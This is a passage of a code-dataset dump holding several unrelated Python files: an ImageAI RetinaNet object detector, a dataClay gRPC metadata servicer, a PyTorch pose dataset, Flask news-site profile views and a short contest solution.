'baseball bat', 35: 'baseball glove', 36: 'skateboard', 37: 'surfboard', 38: 'tennis racket',\r\n                                 39: 'bottle', 40: 'wine glass', 41: 'cup', 42: 'fork', 43: 'knife', 44: 'spoon', 45: 'bowl',\r\n                                 46: 'banana', 47: 'apple', 48: 'sandwich', 49: 'orange', 50: 'broccoli', 51: 'carrot', 52: 'hot dog',\r\n                                 53: 'pizza', 54: 'donut', 55: 'cake', 56: 'chair', 57: 'couch', 58: 'potted plant', 59: 'bed',\r\n                                 60: 'dining table', 61: 'toilet', 62: 'tv', 63: 'laptop', 64: 'mouse', 65: 'remote', 66: 'keyboard',\r\n                                 67: 'cell phone', 68: 'microwave', 69: 'oven', 70: 'toaster', 71: 'sink', 72: 'refrigerator',\r\n                                 73: 'book', 74: 'clock', 75: 'vase', 76: 'scissors', 77: 'teddy bear', 78: 'hair drier',\r\n                                 79: 'toothbrush'}\r\n\r\n\r\n\r\n\r\n    def setModelTypeAsRetinaNet(self):\r\n        \"\"\"\r\n        'setModelTypeAsRetinaNet()' is used to set the model type to the RetinaNet model\r\n        for the object detection instance object.\r\n        :return:\r\n        \"\"\"\r\n        self.__modelType = \"retinanet\"\r\n\r\n\r\n    def setModelPath(self, model_path):\r\n        \"\"\"\r\n        'setModelPath()' function is required and is used to set the file path to the RetinaNet\r\n        object detection model trained on the COCO dataset.\r\n        :param model_path:\r\n        :return:\r\n        \"\"\"\r\n\r\n        if(self.__modelPathAdded == False):\r\n            self.modelPath = model_path\r\n            self.__modelPathAdded = True\r\n\r\n\r\n\r\n    def loadModel(self):\r\n        \"\"\"\r\n        'loadModel()' function is required and is used to load the model structure into the program from the file path defined\r\n        in the setModelPath() function\r\n\r\n        :param:\r\n        :return:\r\n        \"\"\"\r\n\r\n        if (self.__modelLoaded == False):\r\n            if(self.__modelType == \"\"):\r\n                raise ValueError(\"You must set a valid model type before loading the model.\")\r\n            elif(self.__modelType == \"retinanet\"):\r\n                model = resnet50_retinanet(num_classes=80)\r\n                model.load_weights(self.modelPath)\r\n                self.__model_collection.append(model)\r\n                
self.__modelLoaded = True\r\n\r\n\r\n def detectObjectsFromImage(self, image_path, output_image_path, save_detected_objects = False, minimum_percentage_probability = 50):\r\n \"\"\"\r\n 'detectObjectsFromImage()' function is used to detect objects observable in the given image path:\r\n * image_path , file path to the image\r\n * output_image_path , file path to the output image that will contain the detection boxes and label\r\n * save_detected_objects (optional, False by default) , option to save each object detected individually as an image and return an array of the objects' image path.\r\n * minimum_percentage_probability (optional, 50 by default) , option to set the minimum percentage probability for nominating a detected object for output.\r\n\r\n This function returns an array of dictionaries, with each dictionary corresponding to the objects\r\n detected in the image. Each dictionary contains the following property:\r\n - name\r\n - percentage_probability\r\n\r\n If 'save_detected_objects' is set to 'True', this function will return another array (making 2 arrays\r\n that will be returned) that contains list of all the paths to the saved image of each object detected\r\n\r\n :param image_path:\r\n :param output_image_path:\r\n :param save_detected_objects:\r\n :param minimum_percentage_probability:\r\n :return output_objects_array:\r\n \"\"\"\r\n\r\n if(self.__modelLoaded == False):\r\n raise ValueError(\"You must call the loadModel() function before making object detection.\")\r\n elif(self.__modelLoaded == True):\r\n try:\r\n output_objects_array = []\r\n detected_objects_image_array = []\r\n\r\n image = read_image_bgr(image_path)\r\n detected_copy = image.copy()\r\n detected_copy = cv2.cvtColor(detected_copy, cv2.COLOR_BGR2RGB)\r\n\r\n detected_copy2 = image.copy()\r\n detected_copy2 = cv2.cvtColor(detected_copy2, cv2.COLOR_BGR2RGB)\r\n\r\n image = preprocess_image(image)\r\n image, scale = resize_image(image)\r\n\r\n model = self.__model_collection[0]\r\n _, _, detections = model.predict_on_batch(np.expand_dims(image, axis=0))\r\n predicted_numbers = np.argmax(detections[0, :, 4:], axis=1)\r\n scores = detections[0, np.arange(detections.shape[1]), 4 + predicted_numbers]\r\n\r\n detections[0, :, :4] /= scale\r\n\r\n min_probability = minimum_percentage_probability / 100\r\n counting = 0\r\n\r\n for index, (label, score), in enumerate(zip(predicted_numbers, scores)):\r\n if score < min_probability:\r\n continue\r\n\r\n counting += 1\r\n\r\n objects_dir = output_image_path + \"-objects\"\r\n if(save_detected_objects == True):\r\n if (os.path.exists(objects_dir) == False):\r\n os.mkdir(objects_dir)\r\n\r\n color = label_color(label)\r\n\r\n detection_details = detections[0, index, :4].astype(int)\r\n draw_box(detected_copy, detection_details, color=color)\r\n\r\n caption = \"{} {:.3f}\".format(self.numbers_to_names[label], (score * 100))\r\n draw_caption(detected_copy, detection_details, caption)\r\n\r\n each_object_details = {}\r\n each_object_details[\"name\"] = self.numbers_to_names[label]\r\n each_object_details[\"percentage_probability\"] = str(score * 100)\r\n output_objects_array.append(each_object_details)\r\n\r\n if(save_detected_objects == True):\r\n splitted_copy = detected_copy2.copy()[detection_details[1]:detection_details[3],\r\n detection_details[0]:detection_details[2]]\r\n splitted_image_path = objects_dir + \"\\\\\" + self.numbers_to_names[label] + \"-\" + str(counting) + \".jpg\"\r\n pltimage.imsave(splitted_image_path, splitted_copy)\r\n 
detected_objects_image_array.append(splitted_image_path)\r\n\r\n                pltimage.imsave(output_image_path, detected_copy)\r\n\r\n                if(save_detected_objects == True):\r\n                    return output_objects_array, detected_objects_image_array\r\n                else:\r\n                    return output_objects_array\r\n            except Exception:\r\n                raise ValueError(\"Ensure you specified correct paths for the input and output image \")\r\n\r\n\r\n","sub_path":"imageai/Detection/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"612845076","text":"from __future__ import annotations\n\nimport logging\nimport traceback\nfrom typing import TYPE_CHECKING\nfrom uuid import UUID\n\nimport grpc\nfrom google.protobuf.empty_pb2 import Empty\n\nfrom dataclay.metadata.kvdata import ObjectMetadata\nfrom dataclay.protos import (\n    common_messages_pb2,\n    metadata_service_pb2,\n    metadata_service_pb2_grpc,\n)\n\nif TYPE_CHECKING:\n    from dataclay.metadata.api import MetadataAPI\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass MetadataServicer(metadata_service_pb2_grpc.MetadataServiceServicer):\n    \"\"\"Provides methods that implement functionality of the metadata server\"\"\"\n\n    def __init__(self, metadata_service: MetadataAPI):\n        self.metadata_service = metadata_service\n        logger.debug(\"Initialized MetadataServiceServicer\")\n\n    # TODO: define get_exception_info(..) to serialize exceptions\n\n    def NewAccount(self, request, context):\n        try:\n            self.metadata_service.new_account(request.username, request.password)\n        except Exception as e:\n            context.set_details(str(e))\n            context.set_code(grpc.StatusCode.INTERNAL)\n            traceback.print_exc()\n            return Empty()\n        return Empty()\n\n    def NewSession(self, request, context):\n        try:\n            session = self.metadata_service.new_session(\n                request.username, request.password, request.dataset_name\n            )\n        except Exception as e:\n            context.set_details(str(e))\n            context.set_code(grpc.StatusCode.INTERNAL)\n            traceback.print_exc()\n            return common_messages_pb2.Session()\n        return session.get_proto()\n\n    def NewDataset(self, request, context):\n        try:\n            self.metadata_service.new_dataset(request.username, request.password, request.dataset)\n        except Exception as e:\n            context.set_details(str(e))\n            context.set_code(grpc.StatusCode.INTERNAL)\n            traceback.print_exc()\n            return Empty()\n        return Empty()\n\n    def CloseSession(self, request, context):\n        try:\n            self.metadata_service.close_session(UUID(request.id))\n        except Exception as e:\n            context.set_details(str(e))\n            context.set_code(grpc.StatusCode.INTERNAL)\n            traceback.print_exc()\n            return Empty()\n        return Empty()\n\n    def GetDataclay(self, request, context):\n        try:\n            dataclay = self.metadata_service.get_dataclay(UUID(request.dataclay_id))\n        except Exception as e:\n            context.set_details(str(e))\n            context.set_code(grpc.StatusCode.INTERNAL)\n            traceback.print_exc()\n            return common_messages_pb2.Dataclay()\n        return dataclay.get_proto()\n\n    def GetAllBackends(self, request, context):\n        try:\n            backends = self.metadata_service.get_all_backends(request.from_backend)\n            response = dict()\n            for id, backend in backends.items():\n                response[str(id)] = backend.get_proto()\n        except Exception as e:\n            context.set_details(str(e))\n            context.set_code(grpc.StatusCode.INTERNAL)\n            traceback.print_exc()\n            return metadata_service_pb2.GetAllBackendsResponse()\n        return metadata_service_pb2.GetAllBackendsResponse(backends=response)\n\n    ###################\n    # Object Metadata #\n    ###################\n\n    # TODO: Remove it. 
Only EE should be able to call it.\n def RegisterObject(self, request, context):\n try:\n object_md = ObjectMetadata.from_proto(request.object_md)\n self.metadata_service.register_object(object_md, UUID(request.session_id))\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return Empty()\n return Empty()\n\n def GetObjectMDById(self, request, context):\n try:\n object_md = self.metadata_service.get_object_md_by_id(\n UUID(request.object_id),\n UUID(request.session_id),\n check_session=True,\n )\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return common_messages_pb2.ObjectMetadata()\n return object_md.get_proto()\n\n def GetObjectMDByAlias(self, request, context):\n try:\n object_md = self.metadata_service.get_object_md_by_alias(\n request.alias_name,\n request.dataset_name,\n UUID(request.session_id),\n check_session=True,\n )\n except Exception as e:\n traceback.print_exc()\n context.abort(grpc.StatusCode.INTERNAL, str(e))\n return object_md.get_proto()\n\n #########\n # Alias #\n #########\n\n def NewAlias(self, request, context):\n try:\n self.metadata_service.new_alias(\n request.alias_name,\n request.dataset_name,\n UUID(request.object_id),\n UUID(request.session_id),\n check_session=True,\n )\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return Empty()\n return Empty()\n\n def DeleteAlias(self, request, context):\n try:\n self.metadata_service.delete_alias(\n request.alias_name,\n request.dataset_name,\n UUID(request.session_id),\n check_session=True,\n )\n except Exception as e:\n context.set_details(str(e))\n context.set_code(grpc.StatusCode.INTERNAL)\n traceback.print_exc()\n return Empty()\n return Empty()\n","sub_path":"src/dataclay/metadata/servicer.py","file_name":"servicer.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"310088078","text":"import torch\nimport pickle\nfrom torch.utils.data import Dataset, DataLoader\n\nclass PoseDataset(Dataset):\n def __init__(self, pickle_path):\n self.raw_data = []\n with open(pickle_path, 'rb') as f:\n self.raw_data = pickle.load(f)\n self.pairs = []\n for skel_2d, skel_3d in zip(self.raw_data['2d'], self.raw_data['3d']):\n self.pairs.append([skel_2d, skel_3d])\n self.raw_data = [] # release memory\n\n def __len__(self):\n \"\"\"Return the length of the dataset\"\"\"\n return len(self.pairs)\n\n def __getitem__(self, idx):\n \"\"\"Returns a 2D/3D upper body pose pair\n Keyword Arguments:\n idx - index of pair\n \"\"\"\n idx_upper = [0, 1, 3, 4, 5, 9, 10, 11] # upper-body joints\n pair = self.pairs[idx]\n\n # [dim x joints] -> (x1,y1,x2,y2,...)\n inputs = pair[0][:, idx_upper].T.reshape(-1) # upper-body on 2D\n # upper-body on 3D, use only z values\n outputs = pair[1][2::3, idx_upper].T.reshape(-1)\n return torch.from_numpy(inputs).float(),\\\n torch.from_numpy(outputs).float()\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"590794615","text":"from flask import render_template, g, redirect, jsonify, current_app, abort\n\nfrom info import constants, db\nfrom info.models import Category, News, User\nfrom info.utils.common import user_login_data\nfrom 
flask import request\n\nfrom info.utils.image_storage import storage\nfrom info.utils.response_code import RET\nfrom . import profile_blu\n\n\n# Author news list\n# Request path: /user/other_news_list\n# Request method: GET\n# Request params: p, user_id\n# Returns: errno, errmsg\n@profile_blu.route('/other_news_list')\ndef other_news_list():\n    \"\"\"\n    Approach:\n    1. Get the parameters\n    2. Validate the parameters: check for empty values, convert types\n    3. Fetch the author object\n    4. Check whether the author exists\n    5. Fetch the author's news list with pagination\n    6. Read the pagination attributes: total pages, current page, current page items\n    7. Return the response with the data\n    :return:\n    \"\"\"\n    # 1. Get the parameters\n    page = request.args.get('p',1)\n    author_id = request.args.get(\"user_id\")\n\n    # 2. Validate the parameters: check for empty values, convert types\n    if not author_id:\n        return jsonify(errno=RET.PARAMERR,errmsg=\"Missing parameters\")\n\n    try:\n        page = int(page)\n    except Exception as e:\n        current_app.logger.error(e)\n        page = 1\n\n    # 3. Fetch the author object\n    try:\n        author = User.query.get(author_id)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR,errmsg=\"Failed to fetch user\")\n\n    # 4. Check whether the author exists\n    if not author:\n        return jsonify(errno=RET.NODATA,errmsg=\"Author does not exist\")\n\n    # 5. Fetch the author's news list with pagination\n    try:\n        paginate = author.news_list.order_by(News.create_time.desc()).paginate(page,constants.USER_COLLECTION_MAX_NEWS,False)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR,errmsg=\"Failed to query news\")\n\n    # 6. Read the pagination attributes: total pages, current page, current page items\n    total_page = paginate.pages\n    current_page = paginate.page\n    items = paginate.items\n\n    news_list = []\n    for item in items:\n        news_list.append(item.to_dict())\n\n    # 7. Return the response with the data\n    data = {\n        \"total_page\":total_page,\n        \"current_page\":current_page,\n        \"news_list\":news_list\n    }\n    return jsonify(errno=RET.OK,errmsg=\"Fetched successfully\",data=data)\n\n\n\n# Author detail page\n# Request path: /user/other\n# Request method: GET\n# Request params: id\n# Returns: renders the other.html page with a data dict\n@profile_blu.route('/other')\n@user_login_data\ndef other_info():\n    \"\"\"\n    Approach:\n    1. Get the author id\n    2. Check whether the id exists\n    3. Query the author object\n    4. Check whether the author exists\n    5. Assemble the data and render the page\n    :return:\n    \"\"\"\n    # 1. Get the author id\n    author_id = request.args.get(\"id\")\n\n    # 2. Check whether the id exists\n    if not author_id:\n        abort(404)\n        # return jsonify(errno=RET.PARAMERR,errmsg=\"Missing parameters\")\n\n    # 3. Query the author object\n    try:\n        author = User.query.get(author_id)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR,errmsg=\"Failed to query user\")\n\n    # 4. Check whether the author exists\n    if not author:\n        abort(404)\n        # return jsonify(errno=RET.NODATA,errmsg=\"Author does not exist\")\n\n    # 4.2 Check whether the current user follows this author\n    is_followed = False\n    if g.user:\n        if g.user in author.followers:\n            is_followed = True\n\n\n    # 5. Assemble the data and render the page\n    data = {\n        \"author_info\":author.to_dict() if author else \"\",\n        \"user_info\":g.user.to_dict() if g.user else \"\",\n        \"is_followed\":is_followed\n    }\n    return render_template('news/other.html',data=data)\n\n\n# Get my following list\n# Request path: /user/user_follow\n# Request method: GET\n# Request params: p\n# Returns: renders the user_follow.html page with a data dict\n@profile_blu.route('/user_follow')\n@user_login_data\ndef user_follow():\n    \"\"\"\n    Approach:\n    1. Get the parameters\n    2. Convert the parameter type\n    3. Query the data with pagination\n    4. Read the pagination attributes: total pages, current page, current page items\n    5. Convert the object list to a dict list\n    6. Assemble the data and render the page\n    :return:\n    \"\"\"\n    # 1. Get the parameters\n    page = request.args.get(\"p\",1)\n\n    # 2. Convert the parameter type\n    try:\n        page = int(page)\n    except Exception as e:\n        current_app.logger.error(e)\n        page = 1\n\n    # 3. Query the data with pagination\n    try:\n        paginate = g.user.followed.paginate(page,constants.USER_FOLLOWED_MAX_COUNT,False)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.DBERR,errmsg=\"Failed to fetch user\")\n\n    # 4. Read the pagination attributes: total pages, current page, current page items\n    totalPage = paginate.pages\n    currentPage = paginate.page\n    items = paginate.items\n\n    # 5. Convert the object list to a dict list\n    user_list = []\n    for item in items:\n        user_list.append(item.to_dict())\n\n    # 6. Assemble the data and render the page\n    data = {\n        
\"totalPage\":totalPage,\n \"currentPage\":currentPage,\n \"user_list\":user_list\n }\n return render_template('news/user_follow.html',data=data)\n\n\n@profile_blu.route('/news_list')\n@user_login_data\ndef news_list():\n user = g.user\n user_news = []\n current_page = 1\n total_page = 1\n page = request.args.get(\"p\", 1)\n\n try:\n page = int(page)\n paginate = News.query.filter_by(user_id=user.id).paginate(page, constants.USER_COLLECTION_MAX_NEWS, False)\n user_news = paginate.items\n current_page = paginate.page\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n\n news_list = []\n for news in user_news:\n news_list.append(news.to_review_dict())\n\n data = {\n 'news_list': news_list,\n 'current_page': current_page,\n 'total_page': total_page,\n }\n\n return render_template('news/user_news_list.html', data=data)\n\n@profile_blu.route('/news_release', methods=['GET', 'POST'])\n@user_login_data\ndef news_release():\n if request.method == 'GET':\n categories = []\n try:\n # 获取所有的分类数据\n categories = Category.query.all()\n except Exception as e:\n current_app.logger.error(e)\n\n # 定义列表保存分类数据\n categories_dicts = []\n\n for category in categories:\n # 获取字典\n cate_dict = category.to_dict()\n # 拼接内容\n categories_dicts.append(cate_dict)\n\n # 移除`最新`分类\n categories_dicts.pop(0)\n # 返回内容\n return render_template('news/user_news_release.html', data={\"categories\": categories_dicts})\n\n # 获取参数\n title = request.form.get('title')\n category_id = request.form.get('category_id')\n digest = request.form.get('digest')\n index_image = request.files.get('index_image')\n content = request.form.get('content')\n\n # 校验参数\n if not all([title, category_id, digest, index_image, content]):\n return jsonify(errno=RET.PARAMERR, errmsg='参数不全')\n\n # 创建新闻对象\n news = News()\n news.title = title\n news.category_id = category_id\n news.digest = digest\n news.content = content\n news.source = '个人发布'\n news.user_id = g.user.id\n news.status = 1 # 0代表审核通过,1代表审核中,-1代表审核不通过\n\n # 上传图片到七牛云\n try:\n imamg_name = storage(index_image.read())\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.THIRDERR, errmsg='上传图片失败')\n\n news.index_image_url = constants.QINIU_DOMIN_PREFIX + imamg_name\n\n try:\n db.session.add(news)\n db.session.commit()\n except Exception as e:\n current_app.logger(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR, errmsg=\"保存数据失败\" )\n\n return jsonify(errno=RET.OK, errmsg=\"发布成功\")\n\n\n\n@profile_blu.route('/collection')\n@user_login_data\ndef user_collection():\n\n # 获取参数\n page = request.args.get(\"p\", 1)\n\n # 判断参数\n try:\n page = int(page)\n except Exception as e:\n current_app.logger(e)\n page = 1\n # 查询用户指定页数的收藏新闻\n user = g.user\n news_list = []\n total_page = 1\n current_page = 1\n try:\n paginate = user.collection_news.paginate(page ,constants.USER_COLLECTION_MAX_NEWS, False)\n current_page = paginate.page\n total_page = paginate.pages\n news_list = paginate.items\n except Exception as e:\n current_app.logger.error(e)\n\n news_dict_li = []\n for news in news_list:\n news_dict_li.append(news.to_basic_dict())\n\n data = {\n \"total_page\": total_page,\n \"current_page\": current_page,\n \"collections\": news_dict_li}\n\n\n return render_template('news/user_collection.html',data=data)\n\n\n@profile_blu.route('/pass_info', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef pass_info():\n user = g.user\n if request.method == \"GET\":\n return render_template('news/user_pass_info.html')\n\n # 1.获取参数\n data_dict = 
request.json\n    old_password = data_dict.get('old_password')\n    new_password = data_dict.get('new_password')\n\n\n    # 2. Validate the parameters\n    if not all([old_password, new_password]):\n        return jsonify(errno=RET.PARAMERR, errmsg=\"Missing parameters\")\n\n\n    if not user.check_passowrd(old_password):\n        return jsonify(errno=RET.PWDERR, errmsg=\"Original password is incorrect\")\n\n    # 3. Save the password\n    user.password = new_password\n    try:\n        db.session.commit()\n    except Exception as e:\n        current_app.logger.error(e)\n        db.session.rollback()\n        return jsonify(errno=RET.DBERR, errmsg=\"Failed to save data\")\n\n    # 4. Return the result\n    return jsonify(errno=RET.OK, errmsg='Saved successfully')\n\n\n@profile_blu.route('/pic_info', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef pic_info():\n    user = g.user\n    if request.method == 'GET':\n        return render_template('news/user_pic_info.html', data={\"user_info\": user.to_dict()})\n    # 1. Get the uploaded file\n    try:\n        avatar_file = request.files.get(\"avatar\").read()\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.PARAMERR, errmsg=\"Error reading file\")\n\n    # 2. Upload the file to Qiniu Cloud\n    try:\n        url = storage(avatar_file)\n    except Exception as e:\n        current_app.logger.error(e)\n        return jsonify(errno=RET.THIRDERR, errmsg=\"Failed to upload image\")\n\n    # 3. Update the avatar info on the current user model\n\n    # Set the user model data\n    user.avatar_url = url\n    # Save the data to the database\n    try:\n        db.session.commit()\n    except Exception as e:\n        current_app.logger.error(e)\n        db.session.rollback()\n        return jsonify(errno=RET.DBERR, errmsg=\"Error saving user data\")\n\n    # 4. Return the upload result\n    return jsonify(errno=RET.OK, errmsg=\"OK\", data={\"avatar_url\": constants.QINIU_DOMIN_PREFIX + url})\n\n\n@profile_blu.route('/base_info', methods=['GET', 'POST'])\n@user_login_data\ndef base_info():\n    if request.method == 'GET':\n        return render_template('news/user_base_info.html', data={\"user\":g.user.to_dict()})\n\n    # This branch modifies the user's data\n    # 1. Get the incoming parameters\n    nick_name = request.json.get('nick_name')\n    signature = request.json.get('signature')\n    gender = request.json.get('gender')\n\n    if not all([nick_name, signature, gender]):\n        return jsonify(errno=RET.PARAMERR, errmsg=\"Missing parameters\")\n\n    if gender not in ['MAN', 'WOMAN']:\n        return jsonify(errno=RET.PARAMERR, errmsg=\"Invalid parameter\")\n\n    user = g.user\n    user.nick_name = nick_name\n    user.signature = signature\n    user.gender = gender\n\n    return jsonify(errno=RET.OK, errmsg='OK')\n\n\n\n\n\n\n# Show the user profile page\n@profile_blu.route('/show_user_info')\n@user_login_data\ndef show_user_info():\n    user = g.user\n    if not user:\n        return redirect('/')\n\n    data = {\n        \"user_info\":user.to_dict() if user else \"\"\n    }\n\n    return render_template('news/user.html',data=data)","sub_path":"info/modules/profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"363744290","text":"#!/usr/bin/env python3\nn = int(input())\ns = input()\ngame = [0,0]\nrounds = [0,0]\nfor c in s:\n    if c == 'A':\n        game[0] += 1\n    else:\n        game[1] += 1\n    if max(game) == 3:\n        rounds[1 if game[1] == 3 else 0] += 1\n        game = [0,0]\n    if max(rounds) == n:\n        print('Hannes' if rounds[0] == n else 'Arnar')\n        break\n","sub_path":"2017/problems/mylla/submissions/accepted/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}